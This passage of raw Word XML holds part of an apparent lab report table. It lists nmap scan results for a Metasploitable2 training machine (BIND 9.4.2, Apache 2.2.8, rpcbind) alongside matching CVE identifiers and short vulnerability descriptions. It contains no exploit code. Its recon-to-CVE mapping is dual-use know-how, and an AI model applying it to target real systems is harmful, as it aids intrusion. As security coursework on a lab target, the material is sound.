              <w:t>CVE-2001-0894</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6466BD33" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>This is typically the SMTP daemon process for handling incoming mail and routing to the appropriate internal location. postfix/smtp - This is typically the SMTP daemon process for delivering mail out to the world.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="7252C608" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2F6B1C31" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3B253E8C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EDD43EC" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>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dns-nsid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29837E04" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">_  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>bind</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.version</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: 9.4.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34862BA8" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A459B75" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7B699FA8" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E1EED2A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="237D24EC" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="12FE4236" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3F3EC83E" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6694B5F5" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ISC BIND 9.4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7215641F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2008-0122,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39AEFD96" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2008-4163,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">CVE-2008-1447 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="094334F1" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>llows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via crafted input that triggers memory corruption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="47B8AD74" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C8421DB" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2413BFA1" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24AB3AB6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F82CEF" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|_http-title: Metasploitable2 - Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="66E0BE57" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="56F2F090" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Apache httpd 2.2.8 ((Ubuntu) DAV/2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="41039FCD" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2013-6438,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43164CFF" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2013-1884</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="49949E17" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">So, among all 12 results, those are the appropriate, as, this matches to our version. Also, I found that in this Apache version 2.2.8 they fixed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2007-5000 problem like Cross-site scripting (XSS) vulnerability and injection arbitrary web script or HTML via unspecified vectors.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6581AED2" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B1C9FA8" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Allows remote attackers to cause a denial of service (daemon crash) via a crafted DAV WRITE request.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5425C30D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="6779EDE0" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="12E30BEB" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2B4CE281" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>111</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F9A482E" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>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rpcinfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CCFD3F8" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|   program version    port/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>proto  service</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6C03A0F7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">|   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>100000  2</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">            111/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>rpcbind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
